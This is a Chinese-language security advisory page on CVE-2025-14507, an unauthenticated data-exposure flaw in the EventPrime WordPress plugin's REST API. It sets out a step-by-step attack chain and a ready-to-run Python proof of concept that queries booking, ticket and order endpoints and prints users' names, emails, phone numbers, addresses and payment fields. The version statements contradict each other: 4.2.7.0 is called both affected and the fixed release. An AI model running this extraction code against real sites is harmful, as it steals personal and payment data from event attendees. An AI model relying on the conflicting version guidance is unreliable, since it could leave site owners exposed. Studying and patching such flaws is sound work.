CVE-2025-14507 EventPrime WordPress插件REST API敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-14507

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EventPrime - Events Calendar, Bookings and Tickets (WordPress插件)

漏洞概述

EventPrime是一款流行的WordPress活动日历、预订和票务管理插件，在全球范围内被广泛使用。该插件在4.2.7.0及之前的所有版本中存在严重的安全漏洞，攻击者可通过REST API接口无需认证即可访问敏感的预订数据。漏洞根源在于插件的REST API端点（class-eventprime-rest-api.php）缺乏适当的访问控制机制，当管理员在后台启用API功能后，攻击者可以直接调用相关API接口获取用户敏感信息。受影响的数据包括用户姓名、电子邮件地址、票务详情、支付信息和订单密钥等。由于该漏洞影响范围广且利用门槛低，建议所有使用该插件的用户立即采取防护措施。

技术细节

该漏洞存在于EventPrime插件的REST API实现中，具体位置在eventprime-rest-api.php文件的第447行和第651行附近的代码。当管理员在WordPress后台启用EventPrime的API功能后，插件会注册多个REST API端点用于处理活动、预订和票务相关请求。然而，这些API端点在设计时未实施充分的权限检查和身份验证机制，导致任何未经认证的用户都可以通过发送HTTP请求来访问这些端点。攻击者只需构造特定的API请求，如请求/bookings、/tickets或/orders等端点，即可获取存储在数据库中的敏感预订数据。漏洞代码缺少current_user_can()或is_user_logged_in()等权限验证函数，使得API响应中直接返回完整的用户信息和订单详情。插件在4.2.7.0版本中进行了部分修复，但建议用户升级到最新版本以获得完整保护。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标WordPress网站，识别是否安装EventPrime插件及其版本号

STEP 2

步骤2

确认API启用状态：攻击者尝试访问/wp-json/epse/v1/或/wp-json/eventprime/v1/端点，确认REST API是否被管理员启用

STEP 3

步骤3

构造恶意请求：攻击者向暴露的API端点（如/bookings、/tickets、/orders）发送未经认证的HTTP GET请求

STEP 4

步骤4

数据提取：API返回包含敏感信息的JSON响应，攻击者解析并提取用户名、邮箱、支付信息、订单密钥等数据

STEP 5

步骤5

数据利用：攻击者将窃取的敏感信息用于后续攻击，如身份冒充、社会工程、欺诈交易或数据倒卖

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14507 PoC - EventPrime REST API Sensitive Information Exposure
# Affected versions: <= 4.2.7.0
# Requires: API enabled by administrator

import requests
import json
import sys

def check_vulnerability(target_url):
    """Check if target is vulnerable to CVE-2025-14507"""
    
    # API endpoints that expose sensitive data
    endpoints = [
        '/wp-json/epse/v1/bookings',
        '/wp-json/epse/v1/tickets',
        '/wp-json/epse/v1/orders',
        '/wp-json/eventprime/v1/bookings',
        '/wp-json/eventprime/v1/tickets'
    ]
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2025-14507 - EventPrime REST API Information Disclosure\n")
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # Send unauthenticated request
            response = requests.get(url, timeout=10, verify=False)
            
            if response.status_code == 200:
                data = response.json()
                if data and len(str(data)) > 50:  # Check if response contains data
                    print(f"[+] VULNERABLE: {endpoint}")
                    print(f"    Status: {response.status_code}")
                    print(f"    Data length: {len(str(data))} bytes")
                    print(f"    Sample data: {str(data)[:200]}...\n")
                    return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")
    
    print("[-] Target does not appear to be vulnerable or API is disabled")
    return False

def extract_sensitive_data(target_url):
    """Extract sensitive booking data from vulnerable endpoint"""
    
    endpoint = '/wp-json/epse/v1/bookings'
    url = target_url.rstrip('/') + endpoint
    
    print(f"\n[*] Attempting to extract sensitive data...")
    
    try:
        response = requests.get(url, timeout=10, verify=False)
        if response.status_code == 200:
            data = response.json()
            
            # Parse and display sensitive information
            if isinstance(data, list) and len(data) > 0:
                print(f"[+] Extracted {len(data)} booking records")
                for i, record in enumerate(data[:5]):  # Show first 5 records
                    print(f"\n--- Booking Record {i+1} ---")
                    if isinstance(record, dict):
                        for key, value in record.items():
                            sensitive_keys = ['email', 'name', 'payment', 'order', 'phone', 'address']
                            if any(s in key.lower() for s in sensitive_keys):
                                print(f"  {key}: {value}")
            return data
    except Exception as e:
        print(f"[-] Error extracting data: {e}")
    
    return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14507-poc.py <target_url>")
        print("Example: python cve-2025-14507-poc.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)
    extract_sensitive_data(target)

影响范围

EventPrime插件 < 4.2.7.0

防御指南

临时缓解措施

立即在WordPress后台禁用EventPrime插件的REST API功能，或升级插件至4.2.7.0及以上版本。同时建议使用WordPress安全插件限制未认证用户对REST API的访问，并部署Web应用防火墙规则阻止对可疑API端点的请求。建议管理员检查近期日志，确认是否存在异常的数据访问行为。